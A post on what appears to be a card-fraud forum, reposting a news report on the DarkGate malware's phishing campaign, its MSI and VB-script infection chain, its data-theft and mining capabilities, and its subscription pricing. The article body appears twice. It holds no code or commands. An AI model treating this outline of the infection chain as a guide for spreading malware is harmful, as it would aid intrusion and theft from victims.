Carding
Professional
- Messages
- 2,870
- Reaction score
- 2,511
- Points
- 113
The new spyware software is available to hackers of all stripes for a subscription starting from $1000 per day.
Security researchers have discovered a new malicious phishing campaign (MalSpam), in which victims ' devices are infected with malware called DarkGate.
According to Telekom Security experts, the sudden surge in DarkGate activity may be due to the fact that the developer of this malware has started renting it out to a limited circle of affiliates.
The company's detailed report notes that the attack begins with a phishing link that leads the victim to a malicious MSI file through a traffic redirection system. Downloading and running this file initiates a multi-step process, which results in decryption and then launching DarkGate.
Researchers also noticed an alternative version of attacks using a Visual Basic script instead of an MSI file. It uses cURL to extract the AutoIt executable and the script itself. The exact method by which the VB script is delivered to the system is currently unknown.
DarkGate, sold on underground forums by a hacker under the pseudonym "RastaFarEye", is able to hide from antivirus programs, gain a foothold in the system using registry changes, increase privileges, steal data from browsers and programs like Discord and FileZilla.
The malware also communicates with the command server to steal files, run cryptominers, remotely create screenshots, and execute other commands. Early versions of the malware also had a ransomware module.
DarkGate is offered by subscription from $ 1,000 per day to$ 100,000 per year. The developer advertises it as "the best tool for pentesters", but everyone is well aware that there is no legitimate pentest here.
Phishing is still the main way to distribute bootloaders and other malware such as KrakenKeylogger, QakBot, Raccoon Stealer, and others. And according to a recent report from HP, email accounts for 79% of cyber threats identified in Q2 this year.
Security researchers have discovered a new malicious phishing campaign (MalSpam), in which victims ' devices are infected with malware called DarkGate.
According to Telekom Security experts, the sudden surge in DarkGate activity may be due to the fact that the developer of this malware has started renting it out to a limited circle of affiliates.
The company's detailed report notes that the attack begins with a phishing link that leads the victim to a malicious MSI file through a traffic redirection system. Downloading and running this file initiates a multi-step process, which results in decryption and then launching DarkGate.
Researchers also noticed an alternative version of attacks using a Visual Basic script instead of an MSI file. It uses cURL to extract the AutoIt executable and the script itself. The exact method by which the VB script is delivered to the system is currently unknown.
DarkGate, sold on underground forums by a hacker under the pseudonym "RastaFarEye", is able to hide from antivirus programs, gain a foothold in the system using registry changes, increase privileges, steal data from browsers and programs like Discord and FileZilla.
The malware also communicates with the command server to steal files, run cryptominers, remotely create screenshots, and execute other commands. Early versions of the malware also had a ransomware module.
DarkGate is offered by subscription from $ 1,000 per day to$ 100,000 per year. The developer advertises it as "the best tool for pentesters", but everyone is well aware that there is no legitimate pentest here.
Phishing is still the main way to distribute bootloaders and other malware such as KrakenKeylogger, QakBot, Raccoon Stealer, and others. And according to a recent report from HP, email accounts for 79% of cyber threats identified in Q2 this year.
